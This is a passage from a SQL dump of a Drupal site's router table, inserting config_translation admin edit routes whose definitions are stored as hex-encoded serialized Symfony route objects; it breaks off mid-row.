('config_translation.item.edit.entity.menu.edit_form', '/admin/structure/menu/manage/{menu}/translate/{langcode}/edit', '/admin/structure/menu/manage/%/translate/%/edit', 245, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a36313a222f61646d696e2f7374727563747572652f6d656e752f6d616e6167652f7b6d656e757d2f7472616e736c6174652f7b6c616e67636f64657d2f65646974223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35373a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e45646974466f726d223b733a393a22706c7567696e5f6964223b733a343a226d656e75223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a343a226d656e75223b613a323a7b733a343a2274797065223b733a31313a22656e746974793a6d656e75223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a343a226d656e75223b693a313b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a38383a227b5e2f61646d696e2f7374727563747572652f6d656e752f6d616e6167652f283f503c6d656e753e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f65646974247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a353a222f65646974223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a343a226d656e75223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a32383a222f61646d696e2f7374727563747572652f6d656e752f6d616e616765223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a343a226d656e75223b693a313b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3234353b733a31343a227061747465726e4f75746c696e65223b733a34373a222f61646d696e2f7374727563747572652f6d656e752f6d616e6167652f252f7472616e736c6174652f252f65646974223b733a383a226e756d5061727473223b693a383b7d7d, 8),
('config_translation.item.edit.entity.node_type.edit_form', '/admin/structure/types/manage/{node_type}/translate/{langcode}/edit', '/admin/structure/types/manage/%/translate/%/edit', 245, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a36373a222f61646d696e2f7374727563747572652f74797065732f6d616e6167652f7b6e6f64655f747970657d2f7472616e736c6174652f7b6c616e67636f64657d2f65646974223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35373a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e45646974466f726d223b733a393a22706c7567696e5f6964223b733a393a226e6f64655f74797065223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a393a226e6f64655f74797065223b613a323a7b733a343a2274797065223b733a31363a22656e746974793a6e6f64655f74797065223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a393a226e6f64655f74797065223b693a313b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a39343a227b5e2f61646d696e2f7374727563747572652f74797065732f6d616e6167652f283f503c6e6f64655f747970653e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f65646974247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a353a222f65646974223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a393a226e6f64655f74797065223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a32393a222f61646d696e2f7374727563747572652f74797065732f6d616e616765223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a393a226e6f64655f74797065223b693a313b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3234353b733a31343a227061747465726e4f75746c696e65223b733a34383a222f61646d696e2f7374727563747572652f74797065732f6d616e6167652f252f7472616e736c6174652f252f65646974223b733a383a226e756d5061727473223b693a383b7d7d, 8),
('config_translation.item.edit.entity.pathauto_pattern.edit_form', '/admin/config/search/path/patterns/{pathauto_pattern}/translate/{langcode}/edit', '/admin/config/search/path/patterns/%/translate/%/edit', 501, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a37393a222f61646d696e2f636f6e6669672f7365617263682f706174682f7061747465726e732f7b706174686175746f5f7061747465726e7d2f7472616e736c6174652f7b6c616e67636f64657d2f65646974223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35373a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e45646974466f726d223b733a393a22706c7567696e5f6964223b733a31363a22706174686175746f5f7061747465726e223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31363a22706174686175746f5f7061747465726e223b613a323a7b733a343a2274797065223b733a32333a22656e746974793a706174686175746f5f7061747465726e223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31363a22706174686175746f5f7061747465726e223b693a313b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3130363a227b5e2f61646d696e2f636f6e6669672f7365617263682f706174682f7061747465726e732f283f503c706174686175746f5f7061747465726e3e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f65646974247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a353a222f65646974223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31363a22706174686175746f5f7061747465726e223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a33343a222f61646d696e2f636f6e6669672f7365617263682f706174682f7061747465726e73223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31363a22706174686175746f5f7061747465726e223b693a313b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3530313b733a31343a227061747465726e4f75746c696e65223b733a35333a222f61646d696e2f636f6e6669672f7365617263682f706174682f7061747465726e732f252f7472616e736c6174652f252f65646974223b733a383a226e756d5061727473223b693a393b7d7d, 9),
('config_translation.item.edit.entity.search_page.edit_form', '/admin/config/search/pages/manage/{search_page}/translate/{langcode}/edit', '/admin/config/search/pages/manage/%/translate/%/edit', 501, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a37333a222f61646d696e2f636f6e6669672f7365617263682f70616765732f6d616e6167652f7b7365617263685f706167657d2f7472616e736c6174652f7b6c616e67636f64657d2f65646974223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35373a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e45646974466f726d223b733a393a22706c7567696e5f6964223b733a31313a227365617263685f70616765223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31313a227365617263685f70616765223b613a323a7b733a343a2274797065223b733a31383a22656e746974793a7365617263685f70616765223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31313a227365617263685f70616765223b693a313b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3130303a227b5e2f61646d696e2f636f6e6669672f7365617263682f70616765732f6d616e6167652f283f503c7365617263685f706167653e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f65646974247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a353a222f65646974223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31313a227365617263685f70616765223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a33333a222f61646d696e2f636f6e6669672f7365617263682f70616765732f6d616e616765223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31313a227365617263685f70616765223b693a313b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3530313b733a31343a227061747465726e4f75746c696e65223b733a35323a222f61646d696e2f636f6e6669672f7365617263682f70616765732f6d616e6167652f252f7472616e736c6174652f252f65646974223b733a383a226e756d5061727473223b693a393b7d7d, 9),
('config_translation.item.edit.entity.shortcut_set.edit_form', '/admin/config/user-interface/shortcut/manage/{shortcut_set}/translate/{langcode}/edit', '/admin/config/user-interface/shortcut/manage/%/translate/%/edit', 501, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a38353a222f61646d696e2f636f6e6669672f757365722d696e746572666163652f73686f72746375742f6d616e6167652f7b73686f72746375745f7365747d2f7472616e736c6174652f7b6c616e67636f64657d2f65646974223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35373a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e45646974466f726d223b733a393a22706c7567696e5f6964223b733a31323a2273686f72746375745f736574223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31323a2273686f72746375745f736574223b613a323a7b733a343a2274797065223b733a31393a22656e746974793a73686f72746375745f736574223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31323a2273686f72746375745f736574223b693a313b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3131333a227b5e2f61646d696e2f636f6e6669672f757365725c2d696e746572666163652f73686f72746375742f6d616e6167652f283f503c73686f72746375745f7365743e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f65646974247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a353a222f65646974223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31323a2273686f72746375745f736574223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a34343a222f61646d696e2f636f6e6669672f757365722d696e746572666163652f73686f72746375742f6d616e616765223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31323a2273686f72746375745f736574223b693a313b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3530313b733a31343a227061747465726e4f75746c696e65223b733a36333a222f61646d696e2f636f6e6669672f757365722d696e746572666163652f73686f72746375742f6d616e6167652f252f7472616e736c6174652f252f65646974223b733a383a226e756d5061727473223b693a393b7d7d, 9),
('config_translation.item.edit.entity.taxonomy_vocabulary.edit_form', '/admin/structure/taxonomy/manage/{taxonomy_vocabulary}/translate/{langcode}/edit', '/admin/structure/taxonomy/manage/%/translate/%/edit', 245, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a38303a222f61646d696e2f7374727563747572652f7461786f6e6f6d792f6d616e6167652f7b7461786f6e6f6d795f766f636162756c6172797d2f7472616e736c6174652f7b6c616e67636f64657d2f65646974223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35373a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e45646974466f726d223b733a393a22706c7567696e5f6964223b733a31393a227461786f6e6f6d795f766f636162756c617279223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31393a227461786f6e6f6d795f766f636162756c617279223b613a323a7b733a343a2274797065223b733a32363a22656e746974793a7461786f6e6f6d795f766f636162756c617279223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31393a227461786f6e6f6d795f766f636162756c617279223b693a313b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3130373a227b5e2f61646d696e2f7374727563747572652f7461786f6e6f6d792f6d616e6167652f283f503c7461786f6e6f6d795f766f636162756c6172793e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f65646974247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a353a222f65646974223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31393a227461786f6e6f6d795f766f636162756c617279223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a33323a222f61646d696e2f7374727563747572652f7461786f6e6f6d792f6d616e616765223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31393a227461786f6e6f6d795f766f636162756c617279223b693a313b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3234353b733a31343a227061747465726e4f75746c696e65223b733a35313a222f61646d696e2f7374727563747572652f7461786f6e6f6d792f6d616e6167652f252f7472616e736c6174652f252f65646974223b733a383a226e756d5061727473223b693a383b7d7d, 8),
('config_translation.item.edit.entity.user.admin_form', '/admin/config/people/accounts/translate/{langcode}/edit', '/admin/config/people/accounts/translate/%/edit', 125, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a35353a222f61646d696e2f636f6e6669672f70656f706c652f6163636f756e74732f7472616e736c6174652f7b6c616e67636f64657d2f65646974223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35373a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e45646974466f726d223b733a393a22706c7567696e5f6964223b733a32323a22656e746974792e757365722e61646d696e5f666f726d223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a37323a227b5e2f61646d696e2f636f6e6669672f70656f706c652f6163636f756e74732f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f65646974247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a353a222f65646974223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a33393a222f61646d696e2f636f6e6669672f70656f706c652f6163636f756e74732f7472616e736c617465223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3132353b733a31343a227061747465726e4f75746c696e65223b733a34363a222f61646d696e2f636f6e6669672f70656f706c652f6163636f756e74732f7472616e736c6174652f252f65646974223b733a383a226e756d5061727473223b693a373b7d7d, 7);
INSERT INTO `router` (`name`, `path`, `pattern_outline`, `fit`, `route`, `number_parts`) VALUES
('config_translation.item.edit.entity.user_role.edit_form', '/admin/people/roles/manage/{user_role}/translate/{langcode}/edit', '/admin/people/roles/manage/%/translate/%/edit', 245, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a36343a222f61646d696e2f70656f706c652f726f6c65732f6d616e6167652f7b757365725f726f6c657d2f7472616e736c6174652f7b6c616e67636f64657d2f65646974223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35373a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e45646974466f726d223b733a393a22706c7567696e5f6964223b733a393a22757365725f726f6c65223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a393a22757365725f726f6c65223b613a323a7b733a343a2274797065223b733a31363a22656e746974793a757365725f726f6c65223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a393a22757365725f726f6c65223b693a313b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a39313a227b5e2f61646d696e2f70656f706c652f726f6c65732f6d616e6167652f283f503c757365725f726f6c653e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f65646974247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a353a222f65646974223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a393a22757365725f726f6c65223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a32363a222f61646d696e2f70656f706c652f726f6c65732f6d616e616765223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a393a22757365725f726f6c65223b693a313b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3234353b733a31343a227061747465726e4f75746c696e65223b733a34353a222f61646d696e2f70656f706c652f726f6c65732f6d616e6167652f252f7472616e736c6174652f252f65646974223b733a383a226e756d5061727473223b693a383b7d7d, 8),
('config_translation.item.edit.entity.view.edit_form', '/admin/structure/views/view/{view}/translate/{langcode}/edit', '/admin/structure/views/view/%/translate/%/edit', 245, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a36303a222f61646d696e2f7374727563747572652f76696577732f766965772f7b766965777d2f7472616e736c6174652f7b6c616e67636f64657d2f65646974223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35373a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e45646974466f726d223b733a393a22706c7567696e5f6964223b733a343a2276696577223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a343a2276696577223b613a323a7b733a343a2274797065223b733a31313a22656e746974793a76696577223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f